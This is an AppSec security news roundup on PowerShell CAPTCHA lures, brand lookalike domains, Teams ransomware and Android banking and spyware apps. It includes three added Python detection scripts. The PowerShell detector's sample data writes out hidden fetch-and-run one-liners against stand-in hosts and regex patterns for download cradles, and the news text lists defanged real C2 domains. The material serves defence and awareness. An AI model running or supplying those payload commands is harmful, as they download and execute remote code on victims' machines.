Cyber Security News from 18th to 24th Jan
The Cyber Security News AppSec Newsletter edition, by AppSealing


Telegram captcha tricks you into running malicious PowerShell scripts

Cybercriminals are leveraging fake Ross Ulbricht accounts on X to lure users into malicious Telegram channels. These channels trick victims into running PowerShell commands disguised as "identity verification" processes, ultimately infecting their devices with malware.

The attack mimics a CAPTCHA system and uses carefully crafted language to avoid suspicion. The malicious code downloads a ZIP file containing a potential Cobalt Strike loader, often a precursor to ransomware or data theft.

Stay Safe:

  • Never run PowerShell commands or anything copied online without verifying its source.
  • Analyze suspicious content in a text reader; obfuscated code is a red flag.

Stay vigilant and protect your devices!

Source: The Bleeping Computer


1,000+ Malicious Domains Mimic Reddit & WeTransfer To Deliver Malware

Cybercriminals are using fake domains resembling trusted platforms like Reddit and WeTransfer to distribute Lumma Stealer, a potent malware designed to steal sensitive data, including passwords, browser details, and cryptocurrency wallets.

The malware, operating on a Malware-as-a-Service (MaaS) model, uses phishing tactics like fake CAPTCHA pages to trick users into executing PowerShell scripts, enabling data theft. These domains often feature valid SSL certificates, exploiting users' trust in secure connections.
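Both the Telegram "identity verification" lure above and the fake CAPTCHA pages used for Lumma Stealer end the same way: the user pastes a PowerShell one-liner that fetches and runs a payload. That command text is recorded by PowerShell Script Block Logging (Event ID 4104), so a defender can score it. The block below is an added example, not code from the newsletter, BleepingComputer or Cyber Security News; the log records are constructed, and the rule weights and threshold are assumptions. It also decodes `-EncodedCommand` arguments (base64 of UTF-16LE) and rescans the payload, since a single encoded command is otherwise a weak signal.

```python
"""Score PowerShell Script Block Logging (Event ID 4104) text for fake-CAPTCHA style one-liners.

Added example, not code from the newsletter or its sources. SAMPLE_EVENTS are constructed;
rule weights and THRESHOLD are assumptions chosen for this example.
"""
import base64
import re

# (rule name, pattern, weight). Each pattern alone is weak evidence; the combination is the signal.
RULES = [
    ("download_cradle", re.compile(r"\b(iwr|irm|Invoke-WebRequest|Invoke-RestMethod|DownloadString|DownloadFile)\b", re.I), 2),
    ("dynamic_eval", re.compile(r"\b(iex|Invoke-Expression)\b", re.I), 3),
    ("hidden_window", re.compile(r"-w(indowstyle)?\s+hidden", re.I), 2),
    ("exec_policy_bypass", re.compile(r"-e(xecutionpolicy|p)\s+bypass", re.I), 1),
    ("encoded_command", re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I), 3),
    ("base64_decode", re.compile(r"FromBase64String", re.I), 2),
    ("archive_expand", re.compile(r"Expand-Archive|ExtractToDirectory", re.I), 1),
    ("temp_drop", re.compile(r"\$env:(TEMP|APPDATA|LOCALAPPDATA)\b", re.I), 1),
    ("captcha_lure_text", re.compile(r"verif(y|ication)|not a robot|captcha", re.I), 2),
]
THRESHOLD = 4
ENCODED_RX = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.I)


def decode_encoded_command(script_text: str):
    """Return the plaintext of an -EncodedCommand argument (base64 of UTF-16LE), or None."""
    m = ENCODED_RX.search(script_text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_script_block(script_text: str):
    """Return (score, sorted rule names hit) for one script block, including any decoded payload."""
    texts = [script_text]
    decoded = decode_encoded_command(script_text)
    if decoded:
        texts.append(decoded)
    hits = sorted({name for name, rx, _ in RULES for t in texts if rx.search(t)})
    score = sum(w for name, _, w in RULES if name in hits)
    return score, hits


def triage(events):
    """events: dicts with record_id, user, script_text. Returns the records at or above THRESHOLD."""
    flagged = []
    for ev in events:
        score, hits = score_script_block(ev["script_text"])
        if score >= THRESHOLD:
            flagged.append({"record_id": ev["record_id"], "user": ev["user"], "score": score, "hits": hits})
    return flagged


# Constructed sample: the inner payload is encoded the way PowerShell expects for -EncodedCommand.
INNER_COMMAND = "IEX (New-Object Net.WebClient).DownloadString('http://cdn.example.invalid/a.txt')"
ENCODED_SAMPLE = base64.b64encode(INNER_COMMAND.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [  # constructed 4104 records; two benign admin commands, two lure-style commands
    {"record_id": 1001, "user": "CORP\\alice",
     "script_text": "Get-ChildItem -Path C:\\Projects -Recurse | Where-Object Length -gt 1MB"},
    {"record_id": 1002, "user": "CORP\\bob",
     "script_text": ('powershell -w hidden -ep bypass -c "iwr http://verify.example.invalid/v.zip '
                     '-OutFile $env:TEMP\\v.zip; Expand-Archive $env:TEMP\\v.zip $env:TEMP\\v; '
                     'iex (Get-Content $env:TEMP\\v\\run.ps1 -Raw)"  # I am not a robot - Verification ID 7731')},
    {"record_id": 1003, "user": "CORP\\carol",
     "script_text": "Import-Module ActiveDirectory; Get-ADUser -Filter * -Properties LastLogonDate"},
    {"record_id": 1004, "user": "CORP\\dave",
     "script_text": "powershell -NoProfile -EncodedCommand " + ENCODED_SAMPLE},
]

if __name__ == "__main__":
    for rec in triage(SAMPLE_EVENTS):
        print(rec["record_id"], rec["user"], rec["score"], ", ".join(rec["hits"]))
```

Record 1004 only reaches the threshold because the decoded payload is rescanned; a rule that only looks at the outer command line would score it as a lone `-EncodedCommand`, which legitimate management tooling also produces.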

Stay Safe:

  • Double-check URLs for authenticity before entering sensitive information.
  • Use Two-Factor Authentication (2FA) for added protection.
  • Stay informed about phishing tactics to avoid falling victim.
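"Double-check URLs" can be mechanised for a mail gateway or proxy log: reduce the host to its registrable domain, compare it against the brand's known domains, and look for the brand name (or a one-edit misspelling of it) hiding in the labels to the left of the public suffix. The block below is an added example, not code from the newsletter or Cyber Security News. The `BRANDS` allowlist is a minimal assumption (a real deployment keeps it from the vendor's published domain list), the two-label suffix set stands in for the Public Suffix List, and the sample hosts are constructed under the reserved `.invalid` TLD.

```python
"""Flag domains that imitate a brand, the way the Reddit / WeTransfer lookalikes in the newsletter do.

Added example, not code from the newsletter or Cyber Security News. BRANDS is a minimal
allowlist assumed for this example; sample hosts are constructed (.invalid TLD).
"""
import re

BRANDS = {
    "reddit": {"reddit.com", "redd.it"},
    "wetransfer": {"wetransfer.com", "we.tl"},
}
# Common digit/symbol substitutions, folded before comparison ("redd1t" -> "reddlt").
LEET = str.maketrans({"0": "o", "1": "l", "3": "e", "4": "a", "5": "s", "7": "t", "@": "a", "$": "s"})
# Simplification of the Public Suffix List: only a few two-label suffixes are known here.
TWO_LABEL_SUFFIXES = {"co.uk", "com.au", "co.in", "com.br"}


def normalize_host(value: str) -> str:
    """Lower-case, refang '[.]', strip scheme/userinfo/port/path; return the bare host."""
    v = value.strip().lower().replace("[.]", ".").replace("(.)", ".")
    v = re.sub(r"^[a-z][a-z0-9+.-]*://", "", v)
    v = v.split("/", 1)[0].split("?", 1)[0]
    v = v.rsplit("@", 1)[-1].split(":", 1)[0]
    return v.rstrip(".")


def registered_domain(host: str) -> str:
    labels = host.split(".")
    if len(labels) >= 3 and ".".join(labels[-2:]) in TWO_LABEL_SUFFIXES:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def levenshtein(a: str, b: str) -> int:
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(value: str) -> dict:
    host = normalize_host(value)
    reg = registered_domain(host)
    if "." not in reg:
        return {"host": host, "verdict": "no_match", "brand": None, "reason": None}
    for brand, allow in BRANDS.items():
        if reg in allow:
            return {"host": host, "verdict": "legitimate", "brand": brand, "reason": "allowlisted"}
    suffix = reg.split(".", 1)[1]
    stem = host[: -(len(suffix) + 1)]          # everything left of the public suffix
    labels = stem.split(".")
    candidates = re.split(r"[.-]", stem) + [lbl.replace("-", "") for lbl in labels]
    for cand in candidates:
        folded = cand.translate(LEET)
        for brand in BRANDS:
            if folded == brand:
                reason = "brand_token"         # brand as its own label or hyphen part
            elif brand in folded:
                reason = "brand_embedded"      # e.g. redditlogin
            elif len(folded) >= 4 and levenshtein(folded, brand) <= 1:
                reason = "typosquat"           # one edit away, e.g. wetransfr
            else:
                continue
            return {"host": host, "verdict": "lookalike", "brand": brand, "reason": reason}
    return {"host": host, "verdict": "no_match", "brand": None, "reason": None}


SAMPLE_HOSTS = [  # constructed; the .invalid TLD is reserved and never resolves
    "https://www.reddit.com/r/netsec/", "we.tl",
    "reddit-downloads[.]cdn-host[.]invalid", "reddit.com.login-verify.invalid",
    "redd1t.invalid", "wetransfr-files.invalid", "redditlogin.invalid", "filetransfer-tools.invalid",
]

if __name__ == "__main__":
    for h in SAMPLE_HOSTS:
        r = classify(h)
        print(f"{r['host']:40} {r['verdict']:10} {r['brand'] or '-':11} {r['reason'] or '-'}")
```

The `reddit.com.login-verify.invalid` case is why the check works on the registrable domain rather than on the hostname: the brand's own domain appearing as a subdomain of something else is exactly the pattern a valid certificate does nothing to reveal.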

Cybersecurity awareness is key to combating this growing threat. Stay vigilant!

Source: The Cyber Security News


Threat Actors Delivering Ransomware Via Microsoft Teams Using Voice Calls

Sophos MDR has identified two ransomware campaigns, STAC5143 and STAC5777, exploiting Microsoft Teams' default settings, which allow external users to contact internal ones.

Key Tactics Used:

  • Email Bombing: Flooding targets with up to 3,000 spam emails in an hour.
  • Social Engineering: Impersonating IT support to initiate Teams calls.
  • Remote Access: Guiding victims to install Quick Assist or use Teams' remote control.
  • Malware Deployment: Delivering malicious payloads once access is gained.

Campaign Highlights:

  1. STAC5143:
  2. STAC5777:

Recommendations:

  • Restrict external Teams calls.
  • Limit remote access tools like Quick Assist.
  • Use Microsoft Office 365 integration for enhanced monitoring.
  • Leverage Sophos detections for malware like ATK/RPivot-B and Python/Kryptic.

Stay vigilant to prevent these sophisticated attacks.

Source: The Cyber Security News


Beware! Fake SBI Reward APK Attacking Users To Deliver Android Malware

Cybersecurity experts have uncovered a new Android malware campaign using a fake SBI Reward app to deceive users via WhatsApp messages.

Key Highlights:

  • Lure: Victims are promised ₹9,980 in reward points about to expire.
  • Distribution: A malicious APK file, "SBI REWARDZ POINT 1.apk," is shared via WhatsApp.
  • Permissions: The app requests excessive permissions, including SMS, contacts, and storage, often abused by malware.

Technical Details:

  • C2 Servers: Connects to wss://socket.missyou9[.]in and https://superherocloud[.]com to exfiltrate sensitive data like device details, SIM info, and mobile numbers.
  • Phishing Tactics: Mimics SBI login pages to steal credentials, card details, and OTPs.
  • Detection: Flagged as a trojan by 25 antivirus engines on VirusTotal.

Risks:

Victims face potential financial loss and unauthorized access to sensitive banking information.

Recommendations:

  • Avoid downloading APKs from unverified sources.
  • Verify suspicious messages with official bank channels.
  • Only install apps from trusted platforms like the Google Play Store.
  • Use antivirus software and be cautious of urgent reward claims.

Stay vigilant and protect your banking information.

Source: The Cyber Security News


New Android Malware Mimics Chat App to Steal Sensitive Data

Cybersecurity researchers at Cyfirma have uncovered a malware campaign targeting users in South Asia, particularly in Kashmir.

Key Highlights:

  • Malware Disguise: Poses as a chat app called "Tanzeem," attributed to the APT group ‘DONOT,’ believed to support Indian interests.
  • Behavior: The app ceases to function after installation and requests extensive permissions to access sensitive data.
  • Target Audience: Likely aimed at specific individuals or groups within and outside India.

Technical Details:

  • Delivery Method: Misuses OneSignal to send phishing links via push notifications.
  • Permissions: Accesses call logs, contacts, SMS, file storage, precise location, emails, and usernames.
  • Capabilities: Captures keystrokes, system info, screen recordings, and enumerates files.
  • Indicators of Compromise: Includes SHA-256 hash and C2 domains like toolgpt[.]buzz and updash[.]info.
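Both the fake SBI Reward app (SMS, contacts, storage) and the "Tanzeem" chat app (call logs, contacts, SMS, storage, location, accounts) are identified above partly by a permission set that does not fit what the app claims to be. The block below is an added example, not code from the newsletter, Cyfirma or Cyber Security News: it parses an `AndroidManifest.xml`, scores the dangerous permissions that the app's claimed category does not explain, and flags two structural tells the sections describe, a receiver for incoming SMS (OTP theft) and a service bound with the accessibility permission. The manifests are constructed; the permission strings are real Android names, while the weights and per-category expectations are assumptions.

```python
"""Triage an Android manifest for permission sets that don't fit the app's claimed purpose.

Added example, not code from the newsletter or the researchers it cites. The manifests are
constructed; permission names are real Android strings, weights and EXPECTED are assumptions.
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"

# Permission -> risk weight when the claimed purpose of the app does not call for it.
DANGEROUS = {
    "android.permission.READ_SMS": 3, "android.permission.RECEIVE_SMS": 3,
    "android.permission.SEND_SMS": 3, "android.permission.READ_CALL_LOG": 3,
    "android.permission.READ_CONTACTS": 2, "android.permission.GET_ACCOUNTS": 2,
    "android.permission.ACCESS_FINE_LOCATION": 2, "android.permission.RECORD_AUDIO": 2,
    "android.permission.SYSTEM_ALERT_WINDOW": 2, "android.permission.REQUEST_INSTALL_PACKAGES": 2,
    "android.permission.READ_PHONE_STATE": 1, "android.permission.READ_PHONE_NUMBERS": 1,
    "android.permission.READ_EXTERNAL_STORAGE": 1, "android.permission.CAMERA": 1,
}
# What each claimed category may reasonably request (assumed for this example).
EXPECTED = {
    "rewards": {"android.permission.INTERNET", "android.permission.POST_NOTIFICATIONS"},
    "chat": {"android.permission.INTERNET", "android.permission.POST_NOTIFICATIONS",
             "android.permission.CAMERA", "android.permission.RECORD_AUDIO",
             "android.permission.READ_CONTACTS"},
}
SMS_RECEIVED = "android.provider.Telephony.SMS_RECEIVED"
ACCESSIBILITY = "android.permission.BIND_ACCESSIBILITY_SERVICE"


def assess(manifest_xml: str, claimed_category: str) -> dict:
    """Score permissions the claimed category does not explain, plus OTP/accessibility tells."""
    root = ET.fromstring(manifest_xml)
    perms = {e.get(ANDROID_NS + "name") for e in root.iter("uses-permission")}
    unexpected = {p: w for p, w in DANGEROUS.items()
                  if p in perms and p not in EXPECTED[claimed_category]}
    score, flags = sum(unexpected.values()), []
    # A receiver filtering on SMS_RECEIVED lets the app read one-time passcodes as they arrive.
    if any(a.get(ANDROID_NS + "name") == SMS_RECEIVED for a in root.iter("action")):
        flags.append("sms_received_receiver"); score += 3
    # A service bound with the accessibility permission can read the screen and inject input.
    if any(s.get(ANDROID_NS + "permission") == ACCESSIBILITY for s in root.iter("service")):
        flags.append("accessibility_service"); score += 3
    verdict = "high" if score >= 6 else "medium" if score >= 3 else "low"
    return {"package": root.get("package"), "unexpected": sorted(unexpected),
            "flags": flags, "score": score, "verdict": verdict}


def _manifest(pkg, perms, extra=""):
    """Build a constructed manifest string for the samples below."""
    uses = "".join(f'<uses-permission android:name="{p}"/>' for p in perms)
    return (f'<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="{pkg}">'
            f'{uses}<application android:label="{pkg}">{extra}</application></manifest>')

SMS_RECEIVER = ('<receiver android:name=".SmsReceiver" android:exported="true"><intent-filter '
                f'android:priority="999"><action android:name="{SMS_RECEIVED}"/></intent-filter></receiver>')
# Constructed: a "rewards" app that wants SMS, contacts, storage and phone state, and listens for SMS.
FAKE_REWARDS_MANIFEST = _manifest("com.constructed.rewardz", [
    "android.permission.INTERNET", "android.permission.RECEIVE_SMS", "android.permission.READ_SMS",
    "android.permission.READ_CONTACTS", "android.permission.READ_EXTERNAL_STORAGE",
    "android.permission.READ_PHONE_STATE"], SMS_RECEIVER)
# Constructed: a chat app whose permissions match its purpose.
BENIGN_CHAT_MANIFEST = _manifest("com.constructed.chat", [
    "android.permission.INTERNET", "android.permission.CAMERA", "android.permission.RECORD_AUDIO",
    "android.permission.POST_NOTIFICATIONS"])
# Constructed: a chat app that also wants call logs, SMS, precise location and account names.
SPY_CHAT_MANIFEST = _manifest("com.constructed.chatplus", [
    "android.permission.INTERNET", "android.permission.READ_CONTACTS", "android.permission.READ_CALL_LOG",
    "android.permission.READ_SMS", "android.permission.ACCESS_FINE_LOCATION",
    "android.permission.GET_ACCOUNTS", "android.permission.READ_EXTERNAL_STORAGE"])

if __name__ == "__main__":
    for m, cat in [(FAKE_REWARDS_MANIFEST, "rewards"), (BENIGN_CHAT_MANIFEST, "chat"), (SPY_CHAT_MANIFEST, "chat")]:
        print(assess(m, cat))
```

Scoring against a claimed category, rather than against a flat list, is what keeps the benign chat app at "low" while `READ_CONTACTS` still counts against the rewards app: the same permission is ordinary for one purpose and a warning sign for another.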

Threat Actor:

The DONOT APT group has a history of targeting government and military entities in South Asia, showcasing evolving tactics.

Recommendations:

  • Avoid installing apps from unverified sources.
  • Be cautious of apps requesting extensive permissions.
  • Organizations in the region should strengthen security measures against advanced threats.

Stay vigilant against this evolving cyber threat.

Source: The Cyber Security News
